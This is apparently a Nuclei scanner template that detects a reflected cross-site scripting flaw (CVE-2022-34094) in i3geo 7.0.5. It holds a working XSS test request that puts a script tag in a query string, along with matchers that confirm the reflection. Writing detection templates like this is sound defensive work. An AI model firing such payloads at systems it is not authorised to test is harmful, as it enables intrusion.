41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: CVE-2022-34094
|
|
|
|
info:
|
|
name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.
|
|
reference:
|
|
- https://github.com/edmarmoretti/i3geo/issues/5
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34093
|
|
- https://owasp.org/www-community/attacks/xss/
|
|
- https://softwarepublico.gov.br/social/i3geo
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-34094
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00102
|
|
epss-percentile: 0.41424
|
|
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: i3geo_project
|
|
product: i3geo
|
|
tags: cve,cve2022,i3geo,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
|
|
condition: and
|